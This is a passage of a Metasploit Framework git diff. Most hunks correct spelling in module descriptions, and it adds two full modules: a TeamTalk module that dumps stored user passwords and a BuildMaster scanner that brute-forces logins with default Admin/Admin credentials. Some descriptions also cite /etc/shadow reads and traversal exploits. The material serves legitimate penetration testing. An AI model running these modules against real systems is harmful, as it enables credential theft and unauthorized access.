javascript in the context of the targeted URL. Some sample UXSS scripts are provided in data/exploits/uxss. }, 'Author' => [ diff --git a/modules/auxiliary/gather/asterisk_creds.rb b/modules/auxiliary/gather/asterisk_creds.rb index 1604031ea9..b1602a5133 100644 --- a/modules/auxiliary/gather/asterisk_creds.rb +++ b/modules/auxiliary/gather/asterisk_creds.rb @@ -116,7 +116,6 @@ class MetasploitModule < Msf::Auxiliary }.merge service_data login_data = { - last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb index c950966ffe..9eeff32ca5 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_name.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module interfaces with the CorpWatch API to get publicly available info for a given company name. Please note that by using CorpWatch API, you - acknolwdge the limitations of the data CorpWatch provides, and should always + acknowledge the limitations of the data CorpWatch provides, and should always verify the information with the official SEC filings before taking any action. }, 'Author' => [ 'Brandon Perry ' ], diff --git a/modules/auxiliary/gather/eaton_nsm_creds.rb b/modules/auxiliary/gather/eaton_nsm_creds.rb index 5cfd9bea39..3c5669d19f 100644 --- a/modules/auxiliary/gather/eaton_nsm_creds.rb +++ b/modules/auxiliary/gather/eaton_nsm_creds.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary This module will extract user credentials from Network Shutdown Module versions 3.21 and earlier by exploiting a vulnerability found in lib/dbtools.inc, which uses unsanitized user input inside a eval() call. - Please note that in order to extract credentials,the vulnerable service + Please note that in order to extract credentials, the vulnerable service must have at least one USV module (an entry in the "nodes" table in mgedb.db). }, diff --git a/modules/auxiliary/gather/emc_cta_xxe.rb b/modules/auxiliary/gather/emc_cta_xxe.rb index 50db85b880..e34a632f26 100644 --- a/modules/auxiliary/gather/emc_cta_xxe.rb +++ b/modules/auxiliary/gather/emc_cta_xxe.rb @@ -30,10 +30,10 @@ class MetasploitModule < Msf::Auxiliary [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), - OptString.new('SSLVersion', [true, 'SSL version', 'TLS1']), OptString.new('TARGETURI', [ true, "Base directory path", '/']), OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]), - ]) + ] + ) end def run diff --git a/modules/auxiliary/gather/impersonate_ssl.rb b/modules/auxiliary/gather/impersonate_ssl.rb index fa32366b98..87985c1d38 100644 --- a/modules/auxiliary/gather/impersonate_ssl.rb +++ b/modules/auxiliary/gather/impersonate_ssl.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary (self.signed) version using the information from the remote version. The module then Outputs (PEM|DER) format private key / certificate and a combined version for use in Apache or other Metasploit modules requiring SSLCert Inputs for private - key / CA cert have been provided for those with diginator certs hanging about! + key / CA cert have been provided for those with DigiNotar certs hanging about! } )) diff --git a/modules/auxiliary/gather/kerberos_enumusers.rb b/modules/auxiliary/gather/kerberos_enumusers.rb index c1c0a4edd8..e67bdea8c3 100644 --- a/modules/auxiliary/gather/kerberos_enumusers.rb +++ b/modules/auxiliary/gather/kerberos_enumusers.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Kerberos Domain User Enumeration', 'Description' => %q( - This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilises + This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes the different responses returned by the service for valid and invalid users. ), 'Author' => diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 0fac424f52..5ff04d17d4 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Shodan Search', 'Description' => %q{ This module uses the Shodan API to search Shodan. Accounts are free - and an API key is required to used this module. Output from the module + and an API key is required to use this module. Output from the module is displayed to the screen and can be saved to a file or the MSF database. NOTE: SHODAN filters (i.e. port, hostname, os, geo, city) can be used in queries, but there are limitations when used with a free API key. Please diff --git a/modules/auxiliary/gather/teamtalk_creds.rb b/modules/auxiliary/gather/teamtalk_creds.rb new file mode 100644 index 0000000000..44e12fb942 --- /dev/null +++ b/modules/auxiliary/gather/teamtalk_creds.rb @@ -0,0 +1,177 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TeamTalk Gather Credentials', + 'Description' => %q{ + This module retrieves user credentials from BearWare TeamTalk. + + Valid administrator credentials are required. + + This module has been tested successfully on TeamTalk versions + 5.2.2.4885 and 5.2.3.4893. + }, + 'Author' => 'Brendan Coles ', + 'References' => + [ + # Protocol documentation + ['URL', 'https://github.com/BearWare/TeamTalk5/blob/master/ttphpadmin/tt5admin.php'] + ], + 'License' => MSF_LICENSE)) + register_options [ + Opt::RPORT(10333), + OptString.new('USERNAME', [false, 'The username for TeamTalk', 'admin']), + OptString.new('PASSWORD', [false, 'The password for the specified username', 'admin']) + ] + end + + def run + vprint_status 'Connecting...' + + connect + banner = sock.get_once + + unless banner =~ /^teamtalk\s.*protocol="([\d\.]+)"/ + fail_with Failure::BadConfig, 'TeamTalk does not appear to be running' + end + + print_status "Found TeamTalk (protocol version #{$1})" + + report_service :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'teamtalk' + + vprint_status "Authenticating as '#{username}'" + + req = "login username=\"#{username.tr('"', '\"')}\" password=\"#{password.tr('"', '\"')}\"" + res = send_command req + + unless res.to_s.starts_with? 'accepted' + fail_with Failure::NoAccess, 'Authentication failed' + end + + print_good 'Authenticated successfully' + + if res =~ /usertype=2/ + print_good 'User is an administrator' + else + print_warning 'User is not an administrator' + end + + vprint_status "Retrieving users..." + + res = send_command 'listaccounts' + + if res =~ /^error/ && res =~ /message="Command not authorized"/ + print_error 'Insufficient privileges' + return + end + + unless res =~ /^ok\r?\n?\z/ + print_error 'Unexpected reply' + return + end + + cred_table = Rex::Text::Table.new 'Header' => 'TeamTalk User Credentials', + 'Indent' => 1, + 'Columns' => ['Username', 'Password', 'Type'] + + res.each_line do |line| + line.chomp! + next unless line =~ /^useraccount/ + + user = line.scan(/\s+username="(.*?)"\s+password=/).flatten.first.to_s.gsub('\"', '"') + pass = line.scan(/\s+password="(.*?)"\s+usertype=/).flatten.first.to_s.gsub('\"', '"') + type = line.scan(/\s+usertype=(\d+)\s+/).flatten.first + + cred_table << [ user, pass, type ] + report_cred user: user, + password: pass, + type: type, + proof: line + end + + if cred_table.rows.empty? + print_error 'Did not find any users' + return + end + + print_status "Found #{cred_table.rows.size} users" + print_line + print_line cred_table.to_s + + p = store_loot 'teamtalk.user.creds', + 'text/csv', + rhost, + cred_table.to_csv, + 'TeamTalk User Credentials' + + print_good "Credentials saved in: #{p}" + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e + print_error e.message + ensure + disconnect + end + + private + + def username + datastore['USERNAME'] || '' + end + + def password + datastore['PASSWORD'] || '' + end + + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: 'teamtalk', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge service_data + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED, + access_level: opts[:type], + proof: opts[:proof] + }.merge service_data + + create_credential_login login_data + end + + def send_command(cmd = '') + cmd_id = rand(1000) + sock.put "#{cmd} id=#{cmd_id}\n" + + res = '' + timeout = 15 + Timeout.timeout(timeout) do + res << sock.get_once until res =~ /^end id=#{cmd_id}/ + end + + res.to_s.scan(/begin id=#{cmd_id}\r?\n(.*)\r?\nend id=#{cmd_id}/m).flatten.first + rescue Timeout::Error + print_error "Timeout (#{timeout} seconds)" + rescue => e + print_error e.message + end +end diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb index f2c1734fa4..21b2c3a274 100644 --- a/modules/auxiliary/gather/windows_deployment_services_shares.rb +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module will search remote file shares for unattended installation files that may contain domain credentials. This is often used after discovering domain credentials with the - auxilliary/scanner/dcerpc/windows_deployment_services module or in cases where you already + auxiliary/scanner/dcerpc/windows_deployment_services module or in cases where you already have domain credentials. This module will connect to the RemInst share and any Microsoft Deployment Toolkit shares indicated by the share name comments. }, diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index 44672f2485..841ba2f2d1 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -13,9 +13,9 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract', 'Description' => "The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements - and it's results in files for fast access. Version 0.9.2.4 has been fixed afterwards + and its results in files for fast access. Version 0.9.2.4 has been fixed afterwards so it can be vulnerable. These cache files are in the webroot of the Wordpress - installation and can be downloaded if the name is guessed. This modules tries to + installation and can be downloaded if the name is guessed. This module tries to locate them with brute force in order to find usernames and password hashes in these files. W3 Total Cache must be configured with Database Cache enabled and Database Cache Method set to Disk to be vulnerable", diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index a5cb22e12c..49c1f84458 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -12,9 +12,9 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Foxit Reader Authorization Bypass', 'Description' => %q{ - This module exploits a authorization bypass vulnerability in Foxit Reader - build 1120. When a attacker creates a specially crafted pdf file containing - a Open/Execute action, arbitrary commands can be executed without confirmation + This module exploits an authorization bypass vulnerability in Foxit Reader + build 1120. When an attacker creates a specially crafted pdf file containing + an Open/Execute action, arbitrary commands can be executed without confirmation from the victim. }, 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 8643171d35..cbf01588c4 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ Send a spoofed router advertisement with high priority to force hosts to start the IPv6 address auto-config. Monitor for IPv6 host advertisements, - and try to guess the link-local address by concatinating the prefix, and + and try to guess the link-local address by concatenating the prefix, and the host portion of the IPv6 address. Use NDP host solicitation to determine if the IP address is valid' }, diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index 184c32a4cd..e8c1d5fd67 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q( This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains - that allows an unuthenticated remote attacker to retrieve the partial + that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active. ), diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb index c5709320ab..e72a43604b 100644 --- a/modules/auxiliary/scanner/dns/dns_amp.rb +++ b/modules/auxiliary/scanner/dns/dns_amp.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'DNS Amplification Scanner', 'Description' => %q{ This module can be used to discover DNS servers which expose recursive - name lookups which can be used in an amplication attack against a + name lookups which can be used in an amplification attack against a third party. }, 'Author' => [ 'xistence '], # Original scanner module diff --git a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb index 8ee7ad3f65..475f27d38d 100644 --- a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary This module exploits a directory traversal vulnerability found in ColoradoFTP server version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files from the server GET/PUT command including file system traversal strings starting with '\\\'. - The server is writen in Java and therefore platform independant, however this vulnerability is only + The server is written in Java and therefore platform independent, however this vulnerability is only exploitable on the Windows version. }, 'Platform' => 'win', diff --git a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index 6e52fec3e5..66a9876fb0 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Titan FTP XCRC Directory Traversal Information Disclosure', 'Description' => %q{ - This module exploits a directory traversal vulnreability in the XCRC command + This module exploits a directory traversal vulnerability in the XCRC command implemented in versions of Titan FTP up to and including 8.10.1125. By making sending multiple XCRC command, it is possible to disclose the contents of any file on the drive with a simple CRC "brute force" attack. diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index d7bfa95cc2..7b2273b2d1 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Adobe XML External Entity Injection', 'Description' => %q{ - Multiple Adobe Products -- XML External Entity Injection. Affected Sofware: BlazeDS 3.2 and + Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2 }, diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index b8cf0ee28a..6cdc9fa114 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Barracuda Multiple Product "locale" Directory Traversal', 'Description' => %q{ This module exploits a directory traversal vulnerability present in - serveral Barracuda products, including the Barracuda Spam and Virus Firewall, + several Barracuda products, including the Barracuda Spam and Virus Firewall, Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default, this module will attempt to download the Barracuda configuration file. }, diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index bd6de009d6..3d3f346c96 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Bitweaver overlay_type Directory Traversal', 'Description' => %q{ This module exploits a directory traversal vulnerability found in Bitweaver. - When hanlding the 'overlay_type' parameter, view_overlay.php fails to do any + When handling the 'overlay_type' parameter, view_overlay.php fails to do any path checking/filtering, which can be abused to read any file outside the virtual directory. }, diff --git a/modules/auxiliary/scanner/http/buildmaster_login.rb b/modules/auxiliary/scanner/http/buildmaster_login.rb new file mode 100644 index 0000000000..b29d37dc1a --- /dev/null +++ b/modules/auxiliary/scanner/http/buildmaster_login.rb @@ -0,0 +1,96 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Inedo BuildMaster Login Scanner', + 'Description' => %{ + This module will attempt to authenticate to BuildMaster. There is a default user 'Admin' + which has the default password 'Admin'. + }, + 'Author' => [ 'James Otten ' ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => { 'VERBOSE' => true }) + ) + + register_options( + [ + Opt::RPORT(81), + OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']), + OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin']) + ] + ) + end + + def run_host(ip) + return unless buildmaster? + + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + def buildmaster? + begin + res = send_request_cgi('uri' => '/log-in') + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{peer} - HTTP Connection Failed") + return false + end + + if res && res.code == 200 && res.body.include?('BuildMaster_Version') + version = res.body.scan(%r{(.*)}).flatten.first + print_good("#{peer} - Identified BuildMaster #{version}") + return true + else + print_error("#{peer} - Application does not appear to be BuildMaster") + return false + end + end + + def login_succeeded?(res) + if res && res.code == 200 + body = JSON.parse(res.body) + return body.key?('succeeded') && body['succeeded'] + end + false + rescue + false + end + + def do_login(user, pass) + print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn', + 'method' => 'POST', + 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }, + 'vars_post' => + { + 'userName' => user, + 'password' => pass + } + } + ) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if login_succeeded?(res) + print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}") + store_valid_credential(user: user, private: pass) + else + print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}") + end + end +end diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb index c2431705d5..25b4201b83 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary This module attempts to authenticate to different D-Link HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 - Hardware revision A devices.It is possible that this module also works with other + Hardware revision A devices. It is possible that this module also works with other models. }, 'Author' => diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index 204285d319..dc6e5b270f 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'HTTP Error Based SQL Injection Scanner', 'Description' => %q{ - This module identifies the existence of Error Based SQL injection issues. Still requires alot of work + This module identifies the existence of Error Based SQL injection issues. Still requires a lot of work }, 'Author' => [ 'et [at] cyberspace.org' ], diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index 48c2b4a183..4929f9c3e2 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary in a given directory path named as the same name of the directory. - Only works if PATH is differenet than '/'. + Only works if PATH is different than '/'. }, 'Author' => [ 'et [at] metasploit.com' ], 'License' => BSD_LICENSE)) diff --git a/modules/auxiliary/scanner/http/iis_internal_ip.rb b/modules/auxiliary/scanner/http/iis_internal_ip.rb index b22dfbd4a8..2114670eb1 100644 --- a/modules/auxiliary/scanner/http/iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/iis_internal_ip.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Microsoft IIS HTTP Internal IP Disclosure', 'Description' => %q{ - Collect any leaked internal IPs by requesting commonly redirected locs from IIS. + Collect any leaked internal IPs by requesting commonly redirected locations from IIS. }, 'Author' => ['Heather Pilkington'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb b/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb index 8cb61b3d6a..737fdd3306 100644 --- a/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb +++ b/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module scans for Intel Active Management Technology endpoints and attempts to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service - can be found on ports 16992, 16993 (tls), 623, and 624(tls). + can be found on ports 16992, 16993 (tls), 623, and 624 (tls). }, 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index ddfc715340..924830721d 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'JBoss Vulnerability Scanner', 'Description' => %q( - This module scans a JBoss instance for a few vulnerablities. + This module scans a JBoss instance for a few vulnerabilities. ), 'Author' => [ diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index faf3a7282c..953c0ca9c6 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Jenkins-CI Enumeration', 'Description' => %q{ This module enumerates a remote Jenkins-CI installation in an unauthenticated manner, including - host operating system and and Jenkins installation details. + host operating system and Jenkins installation details. }, 'Author' => 'Jeff McCutchan', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 71ad64061d..a7d15f28e0 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -16,8 +16,8 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'HTTP Microsoft SQL Injection Table XSS Infection', 'Description' => %q{ This module implements the mass SQL injection attack in - use lately by concatenation of HTML string that forces a persistant - XSS attack to redirect user browser to a attacker controller website. + use lately by concatenation of HTML string that forces a persistent + XSS attack to redirect user browser to an attacker controller website. }, 'Author' => [ 'et' ], 'License' => BSD_LICENSE)) diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 5d61375a5e..8ff136cba6 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary This module makes requests to resources on the target server in an attempt to find resources which permit NTLM authentication. For resources which permit NTLM authentication, a blank NTLM type 1 message - is sent to enumerate a a type 2 message from the target server. The type + is sent to enumerate a type 2 message from the target server. The type 2 message is then parsed for information such as the Active Directory domain and NetBIOS name. A single URI can be specified with TARGET_URI and/or a file of URIs can be specified with TARGET_URIS_FILE (default). diff --git a/modules/auxiliary/scanner/http/octopusdeploy_login.rb b/modules/auxiliary/scanner/http/octopusdeploy_login.rb index c8c392d2a9..17138235ad 100644 --- a/modules/auxiliary/scanner/http/octopusdeploy_login.rb +++ b/modules/auxiliary/scanner/http/octopusdeploy_login.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Octopus Deploy Login Utility', 'Description' => %q{ - This module simply attempts to login to a Octopus Deploy server using a specific + This module simply attempts to login to an Octopus Deploy server using a specific username and password. It has been confirmed to work on version 3.4.4 }, 'Author' => [ 'James Otten ' ], diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb index b043f1b50a..c0f199ecaa 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module exploits a file download vulnerability found in Oracle Demantra 12.2.1 in combination with an authentication bypass. By - combining these exposures, an unauthenticated user can retreive any file + combining these exposures, an unauthenticated user can retrieve any file on the system by referencing the full file path to any file a vulnerable machine. }, diff --git a/modules/auxiliary/scanner/http/rails_mass_assignment.rb b/modules/auxiliary/scanner/http/rails_mass_assignment.rb index 9e1b483c32..02a377dfae 100644 --- a/modules/auxiliary/scanner/http/rails_mass_assignment.rb +++ b/modules/auxiliary/scanner/http/rails_mass_assignment.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary models with attributes not protected by attr_protected or attr_accessible. After attempting to assign a non-existent field, the default rails with active_record setup will raise an ActiveRecord::UnknownAttributeError - exeption, and reply with HTTP code 500. + exception, and reply with HTTP code 500. }, 'References' => diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index 3439661d9b..51b4bcae2c 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'SAP BusinessObjects User Enumeration', 'Description' => %Q{ This module simply attempts to enumerate SAP BusinessObjects - users.The dswsbobje interface is only used to verify valid + users. The dswsbobje interface is only used to verify valid users for CmcApp. Therefore, any valid users that have been identified can be leveraged by logging into CmcApp. }, diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index 6ed5135a1e..19fb15100f 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Page Scraper', - 'Description' => 'Scrap defined data from a specific web page based on a regular expresion', + 'Description' => 'Scrape defined data from a specific web page based on a regular expression', 'Author' => ['et'], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 2b7f08b7c2..be547ebc00 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary A misconfigured Squid proxy can allow an attacker to make requests on his behalf. This may give the attacker information about devices that he cannot reach but the Squid proxy can. For example, an attacker can make requests for internal IP addresses - against a misconfigurated open Squid proxy exposed to the Internet, therefore performing + against a misconfigured open Squid proxy exposed to the Internet, therefore performing an internal port scan. The error messages returned by the proxy are used to determine if the port is open or not. diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index b8b9f3e173..67950be71b 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Squiz Matrix User Enumeration Scanner', 'Description' => %q{ - This module attempts to enumernate remote users that exist within + This module attempts to enumerate remote users that exist within the Squiz Matrix and MySource Matrix CMS by sending GET requests for asset IDs e.g. ?a=14 and searching for a valid username eg "~root" or "~test" which is prefixed by a "~" in the response. It will also try to GET the users diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb b/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb index 8642aab17e..e3c8e942ed 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability', 'Description' => %q{ - This module will grab the AD account saved in Symantec Messaging Gateway and then + This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed Symantec PBE 